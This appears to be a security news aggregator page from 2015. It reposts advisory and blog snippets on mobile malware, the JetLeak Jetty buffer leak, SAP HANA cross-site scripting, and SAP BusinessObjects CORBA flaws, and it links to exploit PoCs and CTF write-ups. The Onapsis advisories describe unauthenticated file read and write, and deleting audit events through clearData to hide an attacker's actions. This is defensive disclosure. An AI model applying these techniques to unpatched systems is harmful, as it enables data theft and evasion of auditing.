Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Overview of handheld malware for 2014

February 24, 2015, 5:12 pm
$
0
0
Russian anti-virus company Doctor Web presents its 2014 overview of malware for handheld devices. The last year proved to be rather turbulent and rich in terms of information security events. We witnessed the emergence of a variety of new malicious applications for Android. In particular, the number of banking Trojans whose numerous modifications attacked devices in many countries increased significantly. Furthermore, 2014 saw the discovery of the first ransomware programs as well as cryptocurrency miners for Android. On top of this, handhelds were endangered by spying Trojans and multi-purpose programs executing commands from remote servers as well as by malicious code in Android firmware. Neither did virus makers neglect iOS; they presented several malicious applications for this platform.

more here.........http://news.drweb.com/show/?i=9222&lng=en&c=5
Search

Automating DFIR (Digital Forensic Incident Response) - How to series on programming libtsk with python Part 5

February 24, 2015, 6:10 pm
$
0
0
This is part 5 of a planned 24 part series. If you haven't read the prior parts I would highly recommend you do to understand how we got to this point!

Part 1 - Accessing an image and printing the partition table
Part 2 - Extracting a file from an image
Part 3  - Extracting a file from a live system
Part 4 - Turning a python script into a windows executable

In this post, before continuing on to accessing an E01 image which is a bit more complicated, let's make our lives a little bit easier. It's always a pain when you forget to open an administrative command prompt to run your script and in future posts when we get to GUIs its easy to forget to right click and run as administrator/sudo your script. So instead let's have our code do it for us. Now I can't take credit for this code like most good programmers I turn to Google for answers which most frequently will lead you to stackoverflow.com for answers. On stackoverflow I found a series of threads which offered solutions to the problem of elevating a python script and in testing I found the following thread to offer the best solution: http://stackoverflow.com/questions/19672352/how-to-run-python-script-with-elevated-privilage-on-windows

So let's look at what changes we need to make our DFIR Wizard program to do this.

more here.......http://hackingexposedcomputerforensicsblog.blogspot.in/2015/02/automating-dfir-how-to-series-on_24.html

TaiG Jailbreak Tool for iOS 8.2 beta 1 & 2 on Windows just released

February 24, 2015, 6:14 pm
$
0
0
The TaiG Jailbreak Tool for iOS 8.2 beta  can be found
here......http://taig.com/en/

Security Advisory – WP-Slimstat 3.9.5 and lower

February 25, 2015, 1:54 am
$
0
0
WP-Slimstat’s users should update as soon as possible! During a routine audit for our WAF, we discovered a security bug that an attacker could, by breaking the plugin’s weak “secret” key, use to perform a SQL Injection attack against the target website.

more here..........http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html

Gemalto presents the findings of its investigations into the alleged hacking of SIM card encryption keys by Britain's Government Communications Headquarters (GCHQ) and the U.S. National Security Agency (NSA)

February 25, 2015, 1:56 am
$
0
0
Following the release of a report by a news website on February 19, 2015, Gemalto (Euronext NL0000400653 GTO), has conducted a thorough investigation, based in particular on two elements: the purported NSA and GCHQ documents which were made public by this website, and our internal monitoring tools and their past records of attempts of attacks.

more here..........http://www.gemalto.com/press/Pages/Gemalto-presents-the-findings-of-its-investigations-into-the-alleged-hacking-of-SIM-card-encryption-keys.aspx

Clean.navy, DOD cleaning contractor’s website dirty, serves malware

February 25, 2015, 1:58 am
$
0
0
On February 23 Cyphort Labs discovered that the website clean.navy is serving malware. Clean.navy is also used in a malvertising campaign via ad network adgoto.com. We have reported previously on a rising trend in drive-by infection through advertisement networks.  The website belongs to a US Department of Defense contractor – Werth Sanitary Supply Co., Inc. , of 916 Fesler Street El Cajon, California. Clean.navy is loading Angler Exploit Kit with the exploit for CVE-2014-6332 Windows OLE Automation Array Remote Code Execution Vulnerability.

more here........http://www.cyphort.com/dod-contractors-website-clean-navy-serving-drive-exploits/

Copy.com Used to Distribute Crypto Ransomware

February 25, 2015, 2:02 am
$
0
0
hanks to Marco for sending us a sample of yet another piece of crypto-ransom malware. The file was retrieved after visiting a compromised site (www.my- sda24.com) . Interestingly, the malware itself was stored on copy.com.

Copy.com is a cloud based file sharing service targeting corporate users.

more here.........https://isc.sans.edu/diary/Copy.com+Used+to+Distribute+Crypto+Ransomware/19371

Bypassing Windows Lock Screen via Flash Screensaver

February 25, 2015, 2:05 am
$
0
0
We have recently discovered an easy method to bypass the Windows Lock screen when a flash screensaver is running.

The method allows an attacker to gain unauthorized access to a user’s Windows session if he has physical access to a locked machine.

more here.........http://securitycafe.ro/2015/02/23/bypassing-windows-lock-screen-via-flash-screensaver/
Search

Windows/Phone 8.1 Debugging: Getting a Crash Dump File From a Device

February 25, 2015, 2:09 am
$
0
0
Imagine you’re testing out a Windows/Phone app on a device where it’s crashing but you can’t easily debug it. Perhaps it’s not your device.

Now, on the one hand, the Store can help with this ( as per this post ) but that’s not much help if the app isn’t in Store.

Fortunately, both Windows and Phone help you with this. I think the Windows behaviour has been there for a long time and I think the Phone behaviour is specific to V8.1 but I haven’t checked that in any great detail.

Here’s how to get it going.........http://mtaulty.com/CommunityServer/blogs/mike_taultys_blog/archive/2015/02/19/windows-phone-8-1-debugging-getting-a-crash-dump-file-from-a-device.aspx

In-Memory ShellCode Detection Using a Patterns-Based Methodology

February 25, 2015, 3:02 am
$
0
0
During an analysis, it can be really useful to know some common instructions with which malware, and more specifically shellcodes, achieve their goals. As we can imagine, these sets of common instructions could be used first to locate and later to analyze and/or to identify general threats: embedded or injected code.

In this article, we’ll focus on the identification and analysis of Metasploit and some custom shellcodes on the basis of parameters and information coming from brief research and personal experience.

more here..........http://blog.norsecorp.com/2015/02/24/in-memory-shellcode-detection-using-a-patterns-based-methodology/

JetLeak Vulnerability: Remote Leakage Of Shared Buffers In Jetty Web Server [CVE-2015-2080]- Used in products such as Apache ActiveMQ, Alfresco, Apache Geronimo,Apache Maven, Apache Spark, Google App Engine, Eclipse, FUSE, Twitter's Streaming API and Zimbra. Inclusive the server is in open source projects such as Lift, Eucalyptus, Red5, Hadoop and I2P

February 25, 2015, 9:00 am
$
0
0
GDS discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests submitted to the server by other users. I know that sentence is a mouthful, so take a brief moment to digest it, or simply keep reading to understand what that means. Simply put, if you’re running a vulnerable version of the Jetty web server, this can lead to the compromise of sensitive data, including data passed within headers (e.g. cookies, authentication tokens, Anti-CSRF tokens, etc.), as well as data passed in the POST body (e.g. usernames, passwords, authentication tokens, CSRF tokens, PII, etc.). (GDS also observed this data leakage vulnerability with responses as well, but for brevity this blog post will concentrate on requests)

more here..............http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html


Additional reference links on vuln below and testing script included in above article:
 http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html
 https://github.com/eclipse/jetty.project/blob/master/advisories/2015-02-24-httpparser-error-buffer-bleed.md

Scanning Internet-exposed Modbus devices for fun & fun

February 25, 2015, 4:58 am
$
0
0
A scan I have run against the whole IPv4 address space, looking for Internet-exposed Modbus services.

more here.......http://pierre.droids-corp.org/blog/html/2015/02/24/scanning_internet_exposed_modbus_devices_for_fun___fun.html

x86obf source code

February 25, 2015, 5:00 am
$
0
0
After releasing the x86obf tool for free I received quite a few requests
for the source code. It was planned for the future, but I've decided to
release it sooner.

The source code has been slightly stripped. Junk code generators are
removed (they emit NOP only), data encryption is removed and so is
bytecode encryption/obfuscation.

more here..........http://chaplja.blogspot.in/2015/02/x86obf-source-code.html

[Onapsis Security Advisory 2015-001] Multiple Reflected Cross Site Scripting Vulnerabilities in SAP HANA Web-based Development Workbench

February 25, 2015, 6:52 am
$
0
0
Onapsis Security AdvisoryONAPSIS-2015-001: Multiple Reflected Cross Site
Scripting Vulnerabilities in SAP HANA Web-based Development Workbench


1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would be
able to attack other users of the system.

Risk Level: Medium


2. Advisory Information
=========================
- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-001

- - Onapsis SVS ID: ONAPSIS-00137 and ONAPSIS-00138

- - CVE: CVE-2015-2072

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 4.3 (AV:N/AC:M/AU:N/C:N/I:P/A:N)


3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:
  -HANA - Release 73 (1.00.73.00.389160)
  - HANA Developer Edition - Release 80 (1.00.80.00.391861)
  (Check SAP Note 2069676 for detailed information on affected releases)

- - Vulnerability Class: CWE-79: Improper Neutralization of Input During
Web Page Generation (Reflected Cross-Site Scripting)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/multiple-reflected-cross-site-scripting-vulnerabilities-in-sap-hana-webbased-development-workbench


4. Affected Components Description
==================================

SAP HANA is a platform for real-time business. It combines database,
data processing, and application platform capabilities in-memory. The
platform provides libraries for predictive, planning, text processing,
spatial, and business analytics.


5. Vulnerability Details
========================

The SAP HANA contains a reflected Cross Site Scripting Vulnerability
(XSS) on the page
/sap/hana/ide/core/plugins/editor/templates/trace/hanaTraceDetailService.xsjs
and /sap/hana/xs/ide/editor/templates/trace/hanaTraceDetailService.xsjs.

A reflected cross-site scripting attack can be used to non-permanently
deface or modify displayed content from a Web site. Reflected cross-site
scripting can be used to steal another user's authentication
information, such as data relating to their current session. An attacker
who gains access to this data may use it to impersonate the user and
access all information with the same rights as the target user. If an
administrator is impersonated, the security of he application may be
fully compromised.


6. Solution
===========

SAP has released SAP Note 2069676 which provide patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2069676

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.


7. Report Timeline
==================

2014-02-25: Onapsis provides vulnerability information to SAP AG.
2014-02-26: SAP confirms having the information of vulnerability.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.


About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business-critical applications that house vital data and run
business processes including SAP Business Suite, SAP HANA and SAP Mobile
deployments.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool, and Onapsis Security Platform which delivers
enterprise vulnerability, compliance, detection and response
capabilities with analytics.

The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.

[Onapsis Security Advisory 2015-002] SAP Business Objects Unauthorized File Repository Server Read via CORBA

February 25, 2015, 6:53 am
$
0
0
Onapsis Security Advisory ONAPSIS-2015-002: SAP Business Objects
Unauthorized File Repository Server Read via CORBA


1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would be
able to retrieve sensitive business data stored on the remote system.

Risk Level: High


2. Advisory Information
=======================

- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-002

- - Onapsis SVS ID: ONAPSIS-00111

- - CVE: CVE-2015-2073

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 5.0 (AV:N/AC:L/AU:N/C:P/I:N/A:N)


3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:
  - BussinessObjects Edge 4.0
  (Check SAP Note 2018682 for detailed information on affected releases)

- - Vulnerability Class: External Control of File Name or Path (CWE-73)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-file-repository-server-read-via-corba

4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

The BusinessObjects File Repositoy Server (FRS) CORBA listener allows a
user to read any file stored in the FRS without authentication. The only
requirement is that the user know the name of the file in the FRS. For
example, "Âœfrs://Input/a_103/019/000/4967/1b14796c5b0d5f2c.rpt"Â . With
knowledge of this filename, the user can read the file remotely without
authentication.

Note, using CORBA it also possible to test if a directory or file exists
on the file system. Therefore, although unlikely, an attacker could
guess directories and then filenames to brute-force file locations. This
would be considerably easier with a predictable file naming convention.


6. Solution
===========

SAP has released SAP Note 2018682 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2018682
Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.



7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms having the information of vulnerability.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.


About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business-critical applications that house vital data and run
business processes including SAP Business Suite, SAP HANA and SAP Mobile
deployments.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool, and Onapsis Security Platform which delivers
enterprise vulnerability, compliance, detection and response
capabilities with analytics.

The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.
Search

FLASH, CVE-2015-0313 PoC

February 25, 2015, 6:55 am
$
0
0
Use-after-free vulnerability in Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before 16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in February 2015, a different vulnerability than CVE-2015-0315, CVE-2015-0320, and CVE-2015-0322.

more here...........http://blog.hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/

[Onapsis Security Advisory 2015-003] SAP Business Objects Unauthorized File Repository Server Write via CORBA

February 25, 2015, 6:55 am
$
0
0
Onapsis Security AdvisoryONAPSIS-2015-003: SAP Business Objects
Unauthorized File Repository Server Write via CORBA


1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would be
able to overwrite sensitive business data stored on the remote system.

Risk Level: High


2. Advisory Information
=======================

- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-003

- - Onapsis SVS ID: ONAPSIS-00109

- - CVE: CVE-2015-2074

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 6.4 (AV:N/AC:L/AU:N/C:N/I:P/A:P)


3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:
  - BussinessObjects Edge 4.0
  (Check SAP Note 2018681 for detailed information on affected releases)

- - Vulnerability Class: External Control of File Name or Path (CWE-73)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-file-repository-server-write-via-corba


4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

The BusinessObjects File Repositoy Server (FRS) CORBA listener allows
the writing of any file stored in the FRS without authentication. If the
attacker wishes to overwrite a file, the only requirement is that the
user know the name of the file in the FRS. For example,
“frs://Input/a_103/019/000/4967/1b14796c5b0d5f2c.rpt†. With
knowledge of this filename, the user can write the file remotely without
authentication.

Note, using CORBA it is also possible to test if a directory or file
exists on the file system. Therefore, although unlikely, an attacker
could guess directories and then filenames brute-forcing files to
overwrite. This would be considerably easier with a predictable file
naming convention.


6. Solution
===========

SAP has released SAP Note 2018681 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2018681

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.


7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms having the information of vulnerability.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.


About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business-critical applications that house vital data and run
business processes including SAP Business Suite, SAP HANA and SAP Mobile
deployments.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool, and Onapsis Security Platform which delivers
enterprise vulnerability, compliance, detection and response
capabilities with analytics.

The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.

[Onapsis Security Advisory 2015-005] SAP Business Objects Unauthorized Audit Information Access via CORBA

February 25, 2015, 6:56 am
$
0
0
Onapsis Security AdvisoryONAPSIS-2015-005: SAP Business Objects
Unauthorized Audit Information Access via CORBA


1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would be
able to read auditing information thus accessing sensitive business data.
Access to this functionality should be restricted.

Risk Level: Medium


2. Advisory Information
=======================

- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-005

- - Onapsis SVS ID: ONAPSIS-00110

- - CVE: CVE-2015-2076

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 5.0 (AV:N/AC:L/AU:N/C:P/I:N/A:N)


3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:
    - BussinessObjects Edge 4.0
    (Check SAP Note 2011395 for detailed information on affected releases)

- - Vulnerability Class: Improper Authorization (CWE-285)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-audit-information-access-via-corba


4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

It is possible for an unauthenticated user to retrieve any audit events
from a remote BusinessObjects service. This can disclose sensitive
information including report names, universe queries, logins, etc.
Auditing details are listed in the Auditing tab of the CMS. All services
which expose a Auditing service are vulnerable. In the default setting
this includes all  BusinessObjects services except the CMS.


6. Solution
===========

SAP has released SAP Note 2011395 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2011395

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.


7. Report Timeline
==================

2014-02-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms having the information of vulnerability.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.


About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business-critical applications that house vital data and run
business processes including SAP Business Suite, SAP HANA and SAP Mobile
deployments.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool, and Onapsis Security Platform which delivers
enterprise vulnerability, compliance, detection and response
capabilities with analytics.

The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.

[Onapsis Security Advisory 2015-004] SAP Business Objects Unauthorized Audit Information Delete via CORBA

February 25, 2015, 6:56 am
$
0
0
Onapsis Security Advisory ONAPSIS-2015-004: SAP Business Objects
Unauthorized Audit Information Delete via CORBA


1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would be
able to delete auditing information of the remote system.

This way, the attacker could perform malicious activities without being
detected.

Risk Level: High


2. Advisory Information
=======================

- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-004

- - Onapsis SVS ID: ONAPSIS-00112

- - CVE: CVE-2015-2075

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 6.4 (AV:N/AC:L/AU:N/C:N/I:P/A:P)


3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:
    - BussinessObjects Edge 4.0
    (Check SAP Note 2011396 for detailed information on affected releases)

- - Vulnerability Class: Improper Authorization (CWE-285)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/esearch/security-advisories/sap-business-objects-unauthorized-audit-information-delete-via-corba


4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

It is possible for an unauthenticated user to remove audit events from a
remote BusinessObjects service using CORBA. Specifically, the attacker
can tell the remote service (i.e. the auditee) to clear an event from
it's queue. After the event is removed from the auditee queue, the
auditor will never have knowledge of the event and, hence, it will not
be written to the Audit database. An attacker can use this to hide their
actions. By default, the auditor polls all auditees every 5 minutes to
ask for events in their queue.

Note, this vulnerability does not allow an attacker to remove events
already written to the database. It only allows events waiting in the
auditee queue to be removed. The clearData CORBA operation is used to
remove the event; authentication is not required.


6. Solution
===========

SAP has released SAP Note 2011396 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2011396

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.


7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms having the information of vulnerability.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.


About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business–-critical applications that house vital data and run
business processes including SAP Business Suite, SAP HANA and SAP Mobile
deployments.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool, and Onapsis Security Platform which delivers
enterprise vulnerability, compliance, detection and response
capabilities with analytics.

The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.

Revisiting Defcon CTF Shitsco Use-After-Free Vulnerability - Remote Code Execution

February 25, 2015, 6:59 am
$
0
0
Defcon Quals 2014 Shitsco was an interesting challenge. There were two vulnerability in the binary - strcmp information leak and an use-after-free. Challenge could be solved either of these, but getting an RCE seemed hard. Details of the vulnerability could be found here Defcon Quals 2014 - Gynophage - shitsco - [Use-After-Free Vulnerability]. To recap

more here........http://v0ids3curity.blogspot.in/2015/02/revisiting-defcon-ctf-shitsco-use-after.html
Viewing all 8064 articles
Browse latest View live
Search